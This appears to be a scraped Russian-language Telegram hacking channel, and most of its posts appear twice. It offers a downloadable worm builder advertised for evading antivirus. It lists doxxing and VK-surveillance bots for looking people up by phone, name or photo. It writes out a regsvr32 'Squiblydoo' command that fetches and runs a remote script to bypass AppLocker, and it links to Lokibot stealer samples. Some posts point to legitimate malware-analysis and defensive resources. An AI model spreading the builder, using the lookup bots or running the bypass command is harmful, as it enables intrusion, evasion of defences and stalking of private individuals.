Black Hat Worm.rar
957.3 KB
Софт для создания вредоносного ПО
Неплохой билдер червя с приятным интерфейсом, напоминающий njrat.
Присутствует хороший антидетект
Неплохой билдер червя с приятным интерфейсом, напоминающий njrat.
Присутствует хороший антидетект
Forwarded from MTFCore ξ16 🇺🇦✙
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from MTFCore ξ16 🇺🇦✙
Please open Telegram to view this post
VIEW IN TELEGRAM
Подборка OSINT инструментов. Часть 5.
1. searchlikes.ru — найдет где есть лайки и комментарии, дает статистику друзей
2. @stoned_eyes_bot — комплексный пробив по номеру телефона, ФИО, фотографии, номеру автомобиля и т.д.
3. wigle.net/search — находит Wi-Fi точку, ее физический адрес и название
4. metrics.torproject.org — проверяет использовался ли IP-адрес в качестве узла для передачи трафика в Tor
5. boardreader.com — поисковик по форумам
#сайт #сервис #бот #OSINT
1. searchlikes.ru — найдет где есть лайки и комментарии, дает статистику друзей
2. @stoned_eyes_bot — комплексный пробив по номеру телефона, ФИО, фотографии, номеру автомобиля и т.д.
3. wigle.net/search — находит Wi-Fi точку, ее физический адрес и название
4. metrics.torproject.org — проверяет использовался ли IP-адрес в качестве узла для передачи трафика в Tor
5. boardreader.com — поисковик по форумам
#сайт #сервис #бот #OSINT
👍1
Подборка OSINT инструментов. Часть 6.
1. xinit.ru/wifi — покажет местоположение Wi-Fi точки
2. @stoned_eyes_bot — комплексный пробив по номеру телефона, ФИО, фотографии, номеру автомобиля и т.д.
3. http://vk-express.ru/ — слежка за аккаунтом ВК (лайки, скрытые друзья)
4. https://www.imei.info/ — покажет характеристики устройства
5. http://filesearch.link/ — поиск более, чем по 30 файлообменникам
6. @MotherSearchBot — найдет файлы в Telegram
#сайт #сервис #бот #OSINT
1. xinit.ru/wifi — покажет местоположение Wi-Fi точки
2. @stoned_eyes_bot — комплексный пробив по номеру телефона, ФИО, фотографии, номеру автомобиля и т.д.
3. http://vk-express.ru/ — слежка за аккаунтом ВК (лайки, скрытые друзья)
4. https://www.imei.info/ — покажет характеристики устройства
5. http://filesearch.link/ — поиск более, чем по 30 файлообменникам
6. @MotherSearchBot — найдет файлы в Telegram
#сайт #сервис #бот #OSINT
👍1
Dargle — еще один поисковик .onion сайтов в клирнете.
Без рекламы. Имеет внушительную базу клирнет и луковых сайтов: порядка ~6400 штук.
#поисковик #сайт #Tor
Без рекламы. Имеет внушительную базу клирнет и луковых сайтов: порядка ~6400 штук.
#поисковик #сайт #Tor
MetaDefender Cloud — мощный анти-вирусный сканер файлов, ссылок, IP адресов, доменов и хешей.
Можно сочетать с этими сервисами, а так же с ботами с @VirusTotalAV_bot и @DrWebBot для комплексной проверки сомнительного файла, ссылки и т.д.
#сайт #сервис
Можно сочетать с этими сервисами, а так же с ботами с @VirusTotalAV_bot и @DrWebBot для комплексной проверки сомнительного файла, ссылки и т.д.
#сайт #сервис
#Windows 11 ISO
magnet:?xt=urn:btih:7101c26a2ba10ab2374dcc171f92a443bdc986c5&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso
magnet:?xt=urn:btih:7101c26a2ba10ab2374dcc171f92a443bdc986c5&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso
Реверс игры Kong: King of Atlantis (Game Boy Advance) гидрой
https://wrongbaud.github.io/posts/kong-vs-ghidra/
https://wrongbaud.github.io/posts/kong-vs-ghidra/
Wrongbaud’s Blog
Godzilla Vs. Kong Vs … Ghidra? - Ghidra Scripting, PCode Emulation, and Password Cracking
Godzilla Vs. Kong Vs … Ghidra? - Ghidra Scripting, PCode Emulation and Password Cracking
Анализ вредоносных vba макросов, с помощью конвертации их в питон скрипт
https://www.virusbulletin.com/blog/2021/04/new-article-run-your-malicious-vba-macros-anywhere/
https://www.virusbulletin.com/blog/2021/04/new-article-run-your-malicious-vba-macros-anywhere/
Virusbulletin
Virus Bulletin :: New article: Run your malicious VBA macros anywhere!
Kurt Natvig explains how he recompiled malicious VBA macro code to valid harmless Python 3.x code.
Список инструментов для malware analysis macos малвари
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
для детектирования криптографических алгоритмов в бинарниках
http://www.dcs.fmph.uniba.sk/zri/6.prednaska/tools/PEiD/plugins/kanal.htm
https://github.com/nihilus/IDA_Signsrch
https://github.com/marbink/signsrch_mac (спасибо Анониму, для запуска не нужна ИДА)
http://www.dcs.fmph.uniba.sk/zri/6.prednaska/tools/PEiD/plugins/kanal.htm
https://github.com/nihilus/IDA_Signsrch
https://github.com/marbink/signsrch_mac (спасибо Анониму, для запуска не нужна ИДА)
Lokibot - популярный стилер, одной из характерных черт которого является api hashing
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Squiblydoo
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
regsvr32.exe /s /i:http://example.com/test.sct scrobj.dllДанная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
👍1
Anti_DDoS_Guardian_setup.exe
2.5 MB
#софт
Anti DDoS Guardian
Anti DDoS Guardian - это высокопроизводительное программное обеспечение для защиты от DDoS-атак для серверов Windows. Он управляет сетевыми потоками и предотвращает проникновение атакующего трафика. Защита Anti DDoS Guardian может справиться с большинством DDoS / DoS-атак, включая медленные HTTP-атаки Get & Post, атаки на приложения (уровень 7), атаки slowloris, атаки OWASP, атаки методом подбора пароля RDP
Anti DDoS Guardian
Anti DDoS Guardian - это высокопроизводительное программное обеспечение для защиты от DDoS-атак для серверов Windows. Он управляет сетевыми потоками и предотвращает проникновение атакующего трафика. Защита Anti DDoS Guardian может справиться с большинством DDoS / DoS-атак, включая медленные HTTP-атаки Get & Post, атаки на приложения (уровень 7), атаки slowloris, атаки OWASP, атаки методом подбора пароля RDP
GlassWireSetup.exe
53.9 MB
#софт
GlassWire
GlassWire - это программа безопасности и конфиденциальности, которая позволяет вам просматривать текущую и прошлую сетевую активность, а также обнаруживать вредоносные программы, шпионское ПО и другие скрытые угрозы.
GlassWire
GlassWire - это программа безопасности и конфиденциальности, которая позволяет вам просматривать текущую и прошлую сетевую активность, а также обнаруживать вредоносные программы, шпионское ПО и другие скрытые угрозы.
👍1